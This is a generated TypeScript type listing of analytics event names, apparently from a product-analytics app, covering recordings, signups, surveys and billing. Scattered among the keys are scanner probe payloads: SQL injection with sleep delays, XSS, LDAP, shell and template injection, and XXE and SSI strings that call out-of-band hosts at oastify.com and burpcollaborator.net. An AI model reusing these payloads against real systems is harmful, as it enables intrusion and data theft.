    'recording event list scrolled to row index 0': Record<string, any>
    'recording event list scrolled to row index 1': Record<string, any>
    'recording event list scrolled to row index 10': Record<string, any>
    'recording event list scrolled to row index 101': Record<string, any>
    'recording event list scrolled to row index 102': Record<string, any>
    'recording event list scrolled to row index 104': Record<string, any>
    'recording event list scrolled to row index 106': Record<string, any>
    'recording event list scrolled to row index 1062': Record<string, any>
    'recording event list scrolled to row index 107': Record<string, any>
    'recording event list scrolled to row index 108': Record<string, any>
    'recording event list scrolled to row index 11': Record<string, any>
    'recording event list scrolled to row index 110': Record<string, any>
    'recording event list scrolled to row index 111': Record<string, any>
    'recording event list scrolled to row index 114': Record<string, any>
    'recording event list scrolled to row index 1141': Record<string, any>
    'recording event list scrolled to row index 115': Record<string, any>
    'recording event list scrolled to row index 116': Record<string, any>
    'recording event list scrolled to row index 118': Record<string, any>
    'recording event list scrolled to row index 119': Record<string, any>
    'recording event list scrolled to row index 12': Record<string, any>
    'recording event list scrolled to row index 120': Record<string, any>
    'recording event list scrolled to row index 122': Record<string, any>
    'recording event list scrolled to row index 123': Record<string, any>
    'recording event list scrolled to row index 125': Record<string, any>
    'recording event list scrolled to row index 1265': Record<string, any>
    'recording event list scrolled to row index 1266': Record<string, any>
    'recording event list scrolled to row index 1274': Record<string, any>
    'recording event list scrolled to row index 1276': Record<string, any>
    'recording event list scrolled to row index 129': Record<string, any>
    'recording event list scrolled to row index 13': Record<string, any>
    'recording event list scrolled to row index 131': Record<string, any>
    'recording event list scrolled to row index 138': Record<string, any>
    'recording event list scrolled to row index 139': Record<string, any>
    'recording event list scrolled to row index 14': Record<string, any>
    'recording event list scrolled to row index 140': Record<string, any>
    'recording event list scrolled to row index 141': Record<string, any>
    'recording event list scrolled to row index 144': Record<string, any>
    'recording event list scrolled to row index 145': Record<string, any>
    'recording event list scrolled to row index 146': Record<string, any>
    'recording event list scrolled to row index 148': Record<string, any>
    'recording event list scrolled to row index 1486': Record<string, any>
    'recording event list scrolled to row index 15': Record<string, any>
    'recording event list scrolled to row index 150': Record<string, any>
    'recording event list scrolled to row index 151': Record<string, any>
    'recording event list scrolled to row index 152': Record<string, any>
    'recording event list scrolled to row index 158': Record<string, any>
    'recording event list scrolled to row index 16': Record<string, any>
    'recording event list scrolled to row index 160': Record<string, any>
    'recording event list scrolled to row index 163': Record<string, any>
    'recording event list scrolled to row index 166': Record<string, any>
    'recording event list scrolled to row index 168': Record<string, any>
    'recording event list scrolled to row index 169': Record<string, any>
    'recording event list scrolled to row index 17': Record<string, any>
    'recording event list scrolled to row index 175': Record<string, any>
    'recording event list scrolled to row index 176': Record<string, any>
    'recording event list scrolled to row index 177': Record<string, any>
    'recording event list scrolled to row index 18': Record<string, any>
    'recording event list scrolled to row index 180': Record<string, any>
    'recording event list scrolled to row index 181': Record<string, any>
    'recording event list scrolled to row index 182': Record<string, any>
    'recording event list scrolled to row index 183': Record<string, any>
    'recording event list scrolled to row index 186': Record<string, any>
    'recording event list scrolled to row index 188': Record<string, any>
    'recording event list scrolled to row index 19': Record<string, any>
    'recording event list scrolled to row index 192': Record<string, any>
    'recording event list scrolled to row index 193': Record<string, any>
    'recording event list scrolled to row index 195': Record<string, any>
    'recording event list scrolled to row index 199': Record<string, any>
    'recording event list scrolled to row index 2': Record<string, any>
    'recording event list scrolled to row index 20': Record<string, any>
    'recording event list scrolled to row index 201': Record<string, any>
    'recording event list scrolled to row index 204': Record<string, any>
    'recording event list scrolled to row index 206': Record<string, any>
    'recording event list scrolled to row index 208': Record<string, any>
    'recording event list scrolled to row index 209': Record<string, any>
    'recording event list scrolled to row index 21': Record<string, any>
    'recording event list scrolled to row index 214': Record<string, any>
    'recording event list scrolled to row index 22': Record<string, any>
    'recording event list scrolled to row index 220': Record<string, any>
    'recording event list scrolled to row index 226': Record<string, any>
    'recording event list scrolled to row index 228': Record<string, any>
    'recording event list scrolled to row index 23': Record<string, any>
    'recording event list scrolled to row index 234': Record<string, any>
    'recording event list scrolled to row index 238': Record<string, any>
    'recording event list scrolled to row index 24': Record<string, any>
    'recording event list scrolled to row index 240': Record<string, any>
    'recording event list scrolled to row index 242': Record<string, any>
    'recording event list scrolled to row index 249': Record<string, any>
    'recording event list scrolled to row index 25': Record<string, any>
    'recording event list scrolled to row index 252': Record<string, any>
    'recording event list scrolled to row index 257': Record<string, any>
    'recording event list scrolled to row index 26': Record<string, any>
    'recording event list scrolled to row index 265': Record<string, any>
    'recording event list scrolled to row index 268': Record<string, any>
    'recording event list scrolled to row index 27': Record<string, any>
    'recording event list scrolled to row index 28': Record<string, any>
    'recording event list scrolled to row index 285': Record<string, any>
    'recording event list scrolled to row index 29': Record<string, any>
    'recording event list scrolled to row index 296': Record<string, any>
    'recording event list scrolled to row index 3': Record<string, any>
    'recording event list scrolled to row index 30': Record<string, any>
    'recording event list scrolled to row index 301': Record<string, any>
    'recording event list scrolled to row index 309': Record<string, any>
    'recording event list scrolled to row index 31': Record<string, any>
    'recording event list scrolled to row index 310': Record<string, any>
    'recording event list scrolled to row index 312': Record<string, any>
    'recording event list scrolled to row index 317': Record<string, any>
    'recording event list scrolled to row index 32': Record<string, any>
    'recording event list scrolled to row index 320': Record<string, any>
    'recording event list scrolled to row index 33': Record<string, any>
    'recording event list scrolled to row index 334': Record<string, any>
    'recording event list scrolled to row index 34': Record<string, any>
    'recording event list scrolled to row index 348': Record<string, any>
    'recording event list scrolled to row index 349': Record<string, any>
    'recording event list scrolled to row index 35': Record<string, any>
    'recording event list scrolled to row index 352': Record<string, any>
    'recording event list scrolled to row index 357': Record<string, any>
    'recording event list scrolled to row index 364': Record<string, any>
    'recording event list scrolled to row index 37': Record<string, any>
    'recording event list scrolled to row index 377': Record<string, any>
    'recording event list scrolled to row index 38': Record<string, any>
    'recording event list scrolled to row index 39': Record<string, any>
    'recording event list scrolled to row index 4': Record<string, any>
    'recording event list scrolled to row index 40': Record<string, any>
    'recording event list scrolled to row index 406': Record<string, any>
    'recording event list scrolled to row index 41': Record<string, any>
    'recording event list scrolled to row index 412': Record<string, any>
    'recording event list scrolled to row index 415': Record<string, any>
    'recording event list scrolled to row index 42': Record<string, any>
    'recording event list scrolled to row index 422': Record<string, any>
    'recording event list scrolled to row index 43': Record<string, any>
    'recording event list scrolled to row index 435': Record<string, any>
    'recording event list scrolled to row index 439': Record<string, any>
    'recording event list scrolled to row index 44': Record<string, any>
    'recording event list scrolled to row index 446': Record<string, any>
    'recording event list scrolled to row index 45': Record<string, any>
    'recording event list scrolled to row index 451': Record<string, any>
    'recording event list scrolled to row index 459': Record<string, any>
    'recording event list scrolled to row index 46': Record<string, any>
    'recording event list scrolled to row index 472': Record<string, any>
    'recording event list scrolled to row index 477': Record<string, any>
    'recording event list scrolled to row index 48': Record<string, any>
    'recording event list scrolled to row index 491': Record<string, any>
    'recording event list scrolled to row index 494': Record<string, any>
    'recording event list scrolled to row index 50': Record<string, any>
    'recording event list scrolled to row index 51': Record<string, any>
    'recording event list scrolled to row index 517': Record<string, any>
    'recording event list scrolled to row index 52': Record<string, any>
    'recording event list scrolled to row index 526': Record<string, any>
    'recording event list scrolled to row index 54': Record<string, any>
    'recording event list scrolled to row index 545': Record<string, any>
    'recording event list scrolled to row index 55': Record<string, any>
    'recording event list scrolled to row index 56': Record<string, any>
    'recording event list scrolled to row index 57': Record<string, any>
    'recording event list scrolled to row index 58': Record<string, any>
    'recording event list scrolled to row index 59': Record<string, any>
    'recording event list scrolled to row index 597': Record<string, any>
    'recording event list scrolled to row index 6': Record<string, any>
    'recording event list scrolled to row index 60': Record<string, any>
    'recording event list scrolled to row index 61': Record<string, any>
    'recording event list scrolled to row index 612': Record<string, any>
    'recording event list scrolled to row index 63': Record<string, any>
    'recording event list scrolled to row index 64': Record<string, any>
    'recording event list scrolled to row index 65': Record<string, any>
    'recording event list scrolled to row index 66': Record<string, any>
    'recording event list scrolled to row index 67': Record<string, any>
    'recording event list scrolled to row index 68': Record<string, any>
    'recording event list scrolled to row index 69': Record<string, any>
    'recording event list scrolled to row index 7': Record<string, any>
    'recording event list scrolled to row index 70': Record<string, any>
    'recording event list scrolled to row index 71': Record<string, any>
    'recording event list scrolled to row index 72': Record<string, any>
    'recording event list scrolled to row index 73': Record<string, any>
    'recording event list scrolled to row index 74': Record<string, any>
    'recording event list scrolled to row index 75': Record<string, any>
    'recording event list scrolled to row index 76': Record<string, any>
    'recording event list scrolled to row index 77': Record<string, any>
    'recording event list scrolled to row index 772': Record<string, any>
    'recording event list scrolled to row index 773': Record<string, any>
    'recording event list scrolled to row index 78': Record<string, any>
    'recording event list scrolled to row index 79': Record<string, any>
    'recording event list scrolled to row index 798': Record<string, any>
    'recording event list scrolled to row index 8': Record<string, any>
    'recording event list scrolled to row index 80': Record<string, any>
    'recording event list scrolled to row index 81': Record<string, any>
    'recording event list scrolled to row index 82': Record<string, any>
    'recording event list scrolled to row index 83': Record<string, any>
    'recording event list scrolled to row index 84': Record<string, any>
    'recording event list scrolled to row index 85': Record<string, any>
    'recording event list scrolled to row index 86': Record<string, any>
    'recording event list scrolled to row index 88': Record<string, any>
    'recording event list scrolled to row index 89': Record<string, any>
    'recording event list scrolled to row index 9': Record<string, any>
    'recording event list scrolled to row index 90': Record<string, any>
    'recording event list scrolled to row index 92': Record<string, any>
    'recording event list scrolled to row index 920': Record<string, any>
    'recording event list scrolled to row index 923': Record<string, any>
    'recording event list scrolled to row index 93': Record<string, any>
    'recording event list scrolled to row index 94': Record<string, any>
    'recording event list scrolled to row index 95': Record<string, any>
    'recording event list scrolled to row index 97': Record<string, any>
    'recording events fetched': Record<string, any>
    'recording exported to file': Record<string, any>
    recording_has_no_full_snapshot: Record<string, any>
    'recording inspector item expanded': Record<string, any>
    'recording inspector minifilter selected': Record<string, any>
    'recording inspector tab viewed': Record<string, any>
    'recording list fetched': Record<string, any>
    'recording list filter added': Record<string, any>
    'recording list filters changed': Record<string, any>
    'recording list properties fetched': Record<string, any>
    'recording list visibility toggled': Record<string, any>
    'recording loaded': Record<string, any>
    'recording loaded from file': Record<string, any>
    'recording next recording triggered': Record<string, any>
    'recording opened from recent recording list': Record<string, any>
    'recording pinned to list': Record<string, any>
    'recording player error': Record<string, any>
    'recording player seekbar event hovered': Record<string, any>
    'recording player skip inactivity toggled': Record<string, any>
    'recording player speed changed': Record<string, any>
    'recording playlist created': Record<string, any>
    recording_snapshot_loaded: Record<string, any>
    recording_snapshots_v2_empty_response: Record<string, any>
    'recording viewed': Record<string, any>
    'recording viewed summary': Record<string, any>
    'recording viewed with no playtime summary': Record<string, any>
    'recording viewed with very low TTL': Record<string, any>
    'Redirect to logged-in instance modal shown': Record<string, any>
    redirect_to_site_failed: Record<string, any>
    'referral redeemed': Record<string, any>
    reg_data: Record<string, any>
    reg_error: Record<string, any>
    registration_data_entered: Record<string, any>
    registration_error: Record<string, any>
    registration_started: Record<string, any>
    registration_submitted: Record<string, any>
    reg_start: Record<string, any>
    'removed insight from dashboard': Record<string, any>
    'renewal pipeline closed lost': Record<string, any>
    'renewal pipeline closed won': Record<string, any>
    'renewal pipeline onboarding': Record<string, any>
    'renewal pipeline onboarding complete': Record<string, any>
    'replayer error swallowed': Record<string, any>
    'report ingestion third party plugin installed': Record<string, any>
    'resource access level updated': Record<string, any>
    "'+response.write(9003359*9744935)+'": Record<string, any>
    '"+response.write(9003359*9744935)+"': Record<string, any>
    'response.write(9003359*9744935)': Record<string, any>
    "'+response.write(9014158*9335578)+'": Record<string, any>
    '"+response.write(9014158*9335578)+"': Record<string, any>
    'response.write(9014158*9335578)': Record<string, any>
    "'+response.write(9026304*9861231)+'": Record<string, any>
    '"+response.write(9026304*9861231)+"': Record<string, any>
    'response.write(9026304*9861231)': Record<string, any>
    "'+response.write(9043696*9766905)+'": Record<string, any>
    '"+response.write(9043696*9766905)+"': Record<string, any>
    'response.write(9043696*9766905)': Record<string, any>
    "'+response.write(9049516*9938433)+'": Record<string, any>
    '"+response.write(9049516*9938433)+"': Record<string, any>
    'response.write(9049516*9938433)': Record<string, any>
    "'+response.write(9072137*9592268)+'": Record<string, any>
    '"+response.write(9072137*9592268)+"': Record<string, any>
    'response.write(9072137*9592268)': Record<string, any>
    "'+response.write(9083117*9039549)+'": Record<string, any>
    '"+response.write(9083117*9039549)+"': Record<string, any>
    'response.write(9083117*9039549)': Record<string, any>
    "'+response.write(9084670*9191292)+'": Record<string, any>
    '"+response.write(9084670*9191292)+"': Record<string, any>
    'response.write(9084670*9191292)': Record<string, any>
    "'+response.write(9133291*9640101)+'": Record<string, any>
    '"+response.write(9133291*9640101)+"': Record<string, any>
    'response.write(9133291*9640101)': Record<string, any>
    "'+response.write(9144101*9471958)+'": Record<string, any>
    '"+response.write(9144101*9471958)+"': Record<string, any>
    'response.write(9144101*9471958)': Record<string, any>
    "'+response.write(9202745*9724102)+'": Record<string, any>
    '"+response.write(9202745*9724102)+"': Record<string, any>
    'response.write(9202745*9724102)': Record<string, any>
    "'+response.write(9215677*9063520)+'": Record<string, any>
    '"+response.write(9215677*9063520)+"': Record<string, any>
    'response.write(9215677*9063520)': Record<string, any>
    "'+response.write(9263705*9229943)+'": Record<string, any>
    '"+response.write(9263705*9229943)+"': Record<string, any>
    'response.write(9263705*9229943)': Record<string, any>
    "'+response.write(9269072*9537818)+'": Record<string, any>
    '"+response.write(9269072*9537818)+"': Record<string, any>
    'response.write(9269072*9537818)': Record<string, any>
    "'+response.write(9271141*9709819)+'": Record<string, any>
    '"+response.write(9271141*9709819)+"': Record<string, any>
    'response.write(9271141*9709819)': Record<string, any>
    "'+response.write(9498445*9184975)+'": Record<string, any>
    '"+response.write(9498445*9184975)+"': Record<string, any>
    'response.write(9498445*9184975)': Record<string, any>
    "'+response.write(9505428*9444973)+'": Record<string, any>
    '"+response.write(9505428*9444973)+"': Record<string, any>
    'response.write(9505428*9444973)': Record<string, any>
    "'+response.write(9531078*9252273)+'": Record<string, any>
    '"+response.write(9531078*9252273)+"': Record<string, any>
    'response.write(9531078*9252273)': Record<string, any>
    "'+response.write(9566604*9777154)+'": Record<string, any>
    '"+response.write(9566604*9777154)+"': Record<string, any>
    'response.write(9566604*9777154)': Record<string, any>
    "'+response.write(9575447*9763246)+'": Record<string, any>
    '"+response.write(9575447*9763246)+"': Record<string, any>
    'response.write(9575447*9763246)': Record<string, any>
    "'+response.write(9578463*9383340)+'": Record<string, any>
    '"+response.write(9578463*9383340)+"': Record<string, any>
    'response.write(9578463*9383340)': Record<string, any>
    "'+response.write(9604894*9733291)+'": Record<string, any>
    '"+response.write(9604894*9733291)+"': Record<string, any>
    'response.write(9604894*9733291)': Record<string, any>
    "'+response.write(9614792*9406283)+'": Record<string, any>
    '"+response.write(9614792*9406283)+"': Record<string, any>
    'response.write(9614792*9406283)': Record<string, any>
    "'+response.write(9643154*9221861)+'": Record<string, any>
    '"+response.write(9643154*9221861)+"': Record<string, any>
    'response.write(9643154*9221861)': Record<string, any>
    "'+response.write(9649244*9063966)+'": Record<string, any>
    '"+response.write(9649244*9063966)+"': Record<string, any>
    'response.write(9649244*9063966)': Record<string, any>
    "'+response.write(9692934*9427946)+'": Record<string, any>
    '"+response.write(9692934*9427946)+"': Record<string, any>
    'response.write(9692934*9427946)': Record<string, any>
    "'+response.write(9695214*9459478)+'": Record<string, any>
    '"+response.write(9695214*9459478)+"': Record<string, any>
    'response.write(9695214*9459478)': Record<string, any>
    "'+response.write(9699127*9454774)+'": Record<string, any>
    '"+response.write(9699127*9454774)+"': Record<string, any>
    'response.write(9699127*9454774)': Record<string, any>
    "'+response.write(9819855*9410118)+'": Record<string, any>
    '"+response.write(9819855*9410118)+"': Record<string, any>
    'response.write(9819855*9410118)': Record<string, any>
    "'+response.write(9867736*9967634)+'": Record<string, any>
    '"+response.write(9867736*9967634)+"': Record<string, any>
    'response.write(9867736*9967634)': Record<string, any>
    "'+response.write(9938426*9158550)+'": Record<string, any>
    '"+response.write(9938426*9158550)+"': Record<string, any>
    'response.write(9938426*9158550)': Record<string, any>
    "'+response.write(9945300*9139842)+'": Record<string, any>
    '"+response.write(9945300*9139842)+"': Record<string, any>
    'response.write(9945300*9139842)': Record<string, any>
    "'+response.write(9974714*9414753)+'": Record<string, any>
    '"+response.write(9974714*9414753)+"': Record<string, any>
    'response.write(9974714*9414753)': Record<string, any>
    "'+response.write(9991008*9107918)+'": Record<string, any>
    '"+response.write(9991008*9107918)+"': Record<string, any>
    'response.write(9991008*9107918)': Record<string, any>
    "'+response.write(9998829*9820604)+'": Record<string, any>
    '"+response.write(9998829*9820604)+"': Record<string, any>
    'response.write(9998829*9820604)': Record<string, any>
    "'+response.write(9999955*9210021)+'": Record<string, any>
    '"+response.write(9999955*9210021)+"': Record<string, any>
    'response.write(9999955*9210021)': Record<string, any>
    'retention period setting forcibly reduced': Record<string, any>
    'retention period setting reduced': Record<string, any>
    'revenue_analytics_config team setting updated': Record<string, any>
    revenue_analytics_ready: Record<string, any>
    revenue_impact_test: Record<string, any>
    'revenue_tracking_config team setting updated': Record<string, any>
    'rfag0walum7vuc58g5l3lefz9qfi3du1mpkh77uyin.oastify.com': Record<string, any>
    rH4inMEQ: Record<string, any>
    'Rhiannon Bartell': Record<string, any>
    RhOqzfME: Record<string, any>
    'rich text image uploaded': Record<string, any>
    'rich text image upload failed': Record<string, any>
    "rL2uFiIq'; waitfor delay '0:0:15' -- ": Record<string, any>
    'roadmap downvote': Record<string, any>
    'roadmap subscribe': Record<string, any>
    'roadmap subscribe start': Record<string, any>
    'roadmap unsubscribe': Record<string, any>
    'roadmap unsubscribe start': Record<string, any>
    'roadmap upvote': Record<string, any>
    'Roberta Rohan': Record<string, any>
    'Robert Herman': Record<string, any>
    'role custom added to a resource': Record<string, any>
    'ruby-test-event': Record<string, any>
    '@@rzvyH': Record<string, any>
    salesforce_enrichment_chunk_completed: Record<string, any>
    'sales lead disqualified': Record<string, any>
    sampling_disabled_on_insight: Record<string, any>
    sampling_enabled_on_insight: Record<string, any>
    sampling_enabled_on_slow_query: Record<string, any>
    sampling_fast_mode_disabled: Record<string, any>
    sampling_fast_mode_enabled: Record<string, any>
    sampling_percentage_updated: Record<string, any>
    'saved insights list page filter used': Record<string, any>
    'saved insights list page layout changed': Record<string, any>
    'saved insights list page tab changed': Record<string, any>
    'saved insights new insight clicked': Record<string, any>
    'saved insight to dashboard': Record<string, any>
    'saw feature flags error toast': Record<string, any>
    'scene dashboard choice modal opened': Record<string, any>
    'scene dashboard choice set': Record<string, any>
    'schema data deleted': Record<string, any>
    'schema non-retryable error': Record<string, any>
    'schema reloaded': Record<string, any>
    'schema resynced': Record<string, any>
    'schema updated': Record<string, any>
    $screen: Record<string, any>
    screenshot_failed: Record<string, any>
    screenshot_taken: Record<string, any>
    "<script>alert('XSS')</script>": Record<string, any>
    'sdk doctor loaded': Record<string, any>
    'sdk doctor scan events': Record<string, any>
    'sdk doctor snooze warning': Record<string, any>
    'sdk doctor view events': Record<string, any>
    'sdk selected': Record<string, any>
    'second ingestion reminder email sent': Record<string, any>
    'section heading viewed': Record<string, any>
    security_test_ping: Record<string, any>
    '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'"+(select(0)from(select(sleep(15)))v)+"*/': Record<
        string,
        any
    >
    '(select abs(1))': Record<string, any>
    'select edition: clicked book demo': Record<string, any>
    'select edition: clicked calculate cloud enterprise price': Record<string, any>
    'select edition: clicked calculate cloud price': Record<string, any>
    'select edition: clicked calculate enterprise price': Record<string, any>
    'select edition: clicked calculate scale price': Record<string, any>
    'select edition: clicked get started': Record<string, any>
    'selected swapped in query in taxonomic filter': Record<string, any>
    '(select extractvalue(xmltype(\'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % brpni SYSTEM "http://7t1mw56zvcqchumiel0e32xfn6tzhy51tzlmb92xr.oasti\'||\'fy.com/">%brpni;]>\'),\'/l\') from ': Record<
        string,
        any
    >
    '(select extractvalue(xmltype(\'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % mcybb SYSTEM "http://f2i4nkx9haujh0sw3t8r822nwe26q1hpkdi55vsmgb.oasti\'||\'fy.com/">%mcybb;]>\'),\'/l\') from': Record<
        string,
        any
    >
    '(select extractvalue(xmltype(\'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % yhbgn SYSTEM "http://hvgo049cd0xe4is0ljd4gxmep5vxj0j174v2npdc40t.burpcollab\'||\'orator.net/">%yhbgn;]>\'),': Record<
        string,
        any
    >
    "(select load_file('\\\\\\\\ao2htx256tq7xbltec6x9qf7iyoqctcu0l2901nraiy7.burpcollaborator.net\\\\trg'))": Record<
        string,
        any
    >
    "(select load_file('\\\\\\\\il7xogyannin95et6wspvdpqfhla99x0zoxgk67xvm.oastify.com\\\\biv'))": Record<string, any>
    "(select load_file('\\\\\\\\wddly18qsr50sh3deaj8jjd47vdn1is6j876ztpgg45.oastify.com\\\\vdk'))": Record<string, any>
    '(select sba(1))': Record<string, any>
    'send license usage data': Record<string, any>
    'send license usage data error': Record<string, any>
    'send org report failure': Record<string, any>
    'sent campaign no_event_ingestion_follow_up': Record<string, any>
    sent_gift_card: Record<string, any>
    'sent no event ingestion email': Record<string, any>
    'Sent support message in Slack': Record<string, any>
    'session loaded past ttl': Record<string, any>
    'session loaded recent and invalid': Record<string, any>
    'session recording duration type filter changed': Record<string, any>
    'session_recording_event_trigger_config team setting updated': Record<string, any>
    'session recording had unparseable line': Record<string, any>
    'session recording had unparseable lines': Record<string, any>
    'session recording has duplicate snapshots': Record<string, any>
    'session_recording_linked_flag team setting updated': Record<string, any>
    'session recording list duration type to show selected': Record<string, any>
    'session_recording_masking_config team setting updated': Record<string, any>
    'session_recording_minimum_duration_milliseconds team setting updated': Record<string, any>
    'session_recording_network_payload_capture_config team setting updated': Record<string, any>
    'session_recording_opt_in team setting updated': Record<string, any>
    'session recording persisted': Record<string, any>
    'session recording persist failed': Record<string, any>
    session_recording_player_take_screenshot_error: Record<string, any>
    session_recording_player_take_screenshot_success: Record<string, any>
    'session_recording_retention_period team setting updated': Record<string, any>
    'session_recording_sample_rate team setting updated': Record<string, any>
    'session recording snapshots v2 loaded': Record<string, any>
    session_recordings_playlist_counts: Record<string, any>
    'session_recording_trigger_match_type_config team setting updated': Record<string, any>
    'session_recording_url_blocklist_config team setting updated': Record<string, any>
    'session_recording_url_trigger_config team setting updated': Record<string, any>
    'session_recording_version team setting updated': Record<string, any>
    'session removal still interested': Record<string, any>
    'session_replay_config team setting updated': Record<string, any>
    'session replay template used': Record<string, any>
    'sessions filter created': Record<string, any>
    'sessions filter deleted': Record<string, any>
    session_started: Record<string, any>
    'session summarized': Record<string, any>
    'session summary feedback': Record<string, any>
    'session table version updated': Record<string, any>
    '#set($a="")#set($x=$a.getClass().forName("java.net.InetAddress").getByName("f1h4mkw9gatjg0rw2t7r721nve16p1gparypqcgz7nw.oastify.com."))${x}': Record<
        string,
        any
    >
    'set email experiment variant': Record<string, any>
    'set experiment variant': Record<string, any>
    'setting lib': Record<string, any>
    'setup wizard finished': Record<string, any>
    '"-->\'-->`--><!--#set var="d36" value="c251nhx6h7"--><!--#set var="f58" value="e473pjz8j9"--><!--#echo var="d36"--><!--#echo var="f58"--><!--#exec cmd="nslookup -q=cname zpsoa4kt4uh34kfgqdvbvmp7jypqdl4': Record<
        string,
        any
    >
    '"-->\'-->`--><!--#set var="r3k" value="q2j55ofi4v"--><!--#set var="t5m" value="s4l77qhk6x"--><!--#echo var="r3k"--><!--#echo var="t5m"--><!--#exec cmd="nslookup -q=cname dp6ssb25rimid0ioarwkz8tljcp5d41': Record<
        string,
        any
    >
    sguhtdtuho: Record<string, any>
    'shared-quote-viewed': Record<string, any>
    'Sharon Rau': Record<string, any>
    'Sherman Nikolaus': Record<string, any>
    shit: Record<string, any>
    '@@sHmHD': Record<string, any>
    'should view onboarding product intro': Record<string, any>
    'sidebar closed': Record<string, any>
    'sidebar notice acknowledged': Record<string, any>
    'sidebar opened': Record<string, any>
    'Signed up': Record<string, any>
    'Signed up to user slack': Record<string, any>
    signup: Record<string, any>
    'signup: deployment options shown': Record<string, any>
    'signup: deployment type selected': Record<string, any>
    'signup: email modal shown': Record<string, any>
    'signup: email modal skipped': Record<string, any>
    'signup: failed to create contact': Record<string, any>
    'signup: failed to update contact': Record<string, any>
    'sign up organization name not provided': Record<string, any>
    'signup: submit email': Record<string, any>
    sitebot_message: Record<string, any>
    sJeONMFS: Record<string, any>
    'Skye Veum': Record<string, any>
    'slack_incoming_webhook team setting updated': Record<string, any>
    '`sleep 11`': Record<string, any>
    '|sleep 11 & ping -n 11 localhost': Record<string, any>
    'sleep(20)': Record<string, any>
    "SLNjABEF'; waitfor delay '0:0:15' -- ": Record<string, any>
    snapshots_api_called_with_personal_api_key: Record<string, any>
    'Solon Batz': Record<string, any>
    someevent: Record<string, any>
    'some event': Record<string, any>
    some_event: Record<string, any>
    'source created': Record<string, any>
    'source deleted': Record<string, any>
    source_notify_me: Record<string, any>
    'source reloaded': Record<string, any>
    'source schema saved': Record<string, any>
    'source schema viewed': Record<string, any>
    spinner_unloaded: Record<string, any>
    'split person started': Record<string, any>
    'sql-editor-accepted-suggestion': Record<string, any>
    'sql-editor-fix-error-click': Record<string, any>
    'sql-editor-rejected-suggestion': Record<string, any>
    'sql-editor-side-tab-change': Record<string, any>
    "sqSWx87r' OR 205=(SELECT 205 FROM PG_SLEEP(15))--": Record<string, any>
    'squeak delete reply': Record<string, any>
    'squeak delete reply start': Record<string, any>
    'squeak error': Record<string, any>
    'squeak login start': Record<string, any>
    'squeak login success': Record<string, any>
    'squeak logout': Record<string, any>
    'squeak profile update': Record<string, any>
    'squeak profile update start': Record<string, any>
    'squeak publish reply': Record<string, any>
    'squeak publish reply start': Record<string, any>
    'squeak reply': Record<string, any>
    'squeak reply start': Record<string, any>
    'squeak resolve': Record<string, any>
    'squeak resolve start': Record<string, any>
    'squeak signup start': Record<string, any>
    'squeak signup success': Record<string, any>
    ssrf_test_011_solver_ffc5067d70: Record<string, any>
    ssrf_test_2_011_solver_ffc5067d70: Record<string, any>
    'standalone ai tool call': Record<string, any>
    'starting process_completed_invoice': Record<string, any>
    startup_plan_balance_100_percent: Record<string, any>
    startup_plan_balance_50_percent: Record<string, any>
    startup_plan_balance_75_percent: Record<string, any>
    startup_plan_credit_bonus_added: Record<string, any>
    startup_plan_customer_added: Record<string, any>
    startup_plan_customer_added_backfill: Record<string, any>
    startup_plan_customer_removed: Record<string, any>
    startup_plan_extended: Record<string, any>
    'startup program application submitted': Record<string, any>
    'Stripe Customer Created': Record<string, any>
    'Stripe Customer Subscribed': Record<string, any>
    'Stripe Invoice Paid': Record<string, any>
    'stuck session player skipped forward': Record<string, any>
    'submitted BAA': Record<string, any>
    'subscribed during onboarding': Record<string, any>
    subscribe_to_product_updates: Record<string, any>
    'subscription cancelled': Record<string, any>
    'subscription created': {
        resource_type?: string
        dashboard_id?: number
        insight_short_id?: string
        subscription_id?: number
        target_type?: string
        ai_summary_prefilled?: boolean
    }
    subscription_intent: Record<string, any>
    'subscription updated': Record<string, any>
    'Substack subscribe error': Record<string, any>
    'Substack subscribe success': Record<string, any>
    sUMexjQQ: Record<string, any>
    'superuser created': Record<string, any>
    support_ticket: Record<string, any>
    support_ticket_closed: Record<string, any>
    'survey bulk duplicated': Record<string, any>
    'survey_config team setting updated': Record<string, any>
    'survey created': Record<string, any>
    'survey cycle detected': Record<string, any>
    survey_data_processing_accepted: Record<string, any>
    survey_data_processing_refused: Record<string, any>
    'survey dismissed': Record<string, any>
    'survey edited': Record<string, any>
    'survey launched': Record<string, any>
    survey_resonse_rated: Record<string, any>
    'survey response summarized': Record<string, any>
    'survey resumed': Record<string, any>
    'surveys beta users interest survey sent': Record<string, any>
    'survey sent': Record<string, any>
    'survey shown': Record<string, any>
    'surveys_opt_in team setting updated': Record<string, any>
    'survey stopped': Record<string, any>
    'survey template clicked': Record<string, any>
    'survey viewed': Record<string, any>
    'Susan Terry': Record<string, any>
    'szrpdwxegt)(objectClass=*': Record<string, any>
    t: Record<string, any>
    "TabDY7TI') OR 431=(SELECT 431 FROM PG_SLEEP(15))--": Record<string, any>
    '@@TaJ1A': Record<string, any>
    'Talia Runolfsdottir': Record<string, any>
    'Tanner Stiedemann': Record<string, any>
    tasesefasd: Record<string, any>
    taxonomic_filter_search_query: Record<string, any>
    tbu8u8nb: Record<string, any>
    "Td98pjPf' OR 828=(SELECT 828 FROM PG_SLEEP(15))--": Record<string, any>
    'tdf event definition created': Record<string, any>
    'team deleted': Record<string, any>
    'team has ingested events': Record<string, any>
    'team invite attempted': Record<string, any>
    'team invite executed': Record<string, any>
    'team member deleted': Record<string, any>
    'team member invited': Record<string, any>
    'template requested during onboarding': Record<string, any>
    'template selected during onboarding': Record<string, any>
    test: Record<string, any>
    TEST: Record<string, any>
    'test 12345': Record<string, any>
    'test_account_filters_default_checked team setting updated': Record<string, any>
    'test_account_filters team setting updated': Record<string, any>
    'test account filters updated': Record<string, any>
    test_analytics_event: Record<string, any>
    test_avo_123: Record<string, any>
    'test-brave': Record<string, any>
    'test-brave-shields-up': Record<string, any>
    'test-ci-job': Record<string, any>
    test_client_event: Record<string, any>
    'test-customer-report': Record<string, any>
    testevent: Record<string, any>
    'test event': Record<string, any>
    test_event: Record<string, any>
    'test-event': Record<string, any>
    test_event_005_solver_d371d75efb: Record<string, any>
    test_event_013_solver_27867df26c_reflection_test: Record<string, any>
    'test-event-33223': Record<string, any>
    test_event_9q5wpzZ3: Record<string, any>
    'test-event-cameron': Record<string, any>
    test_event_from_attacker: Record<string, any>
    'test event from console': Record<string, any>
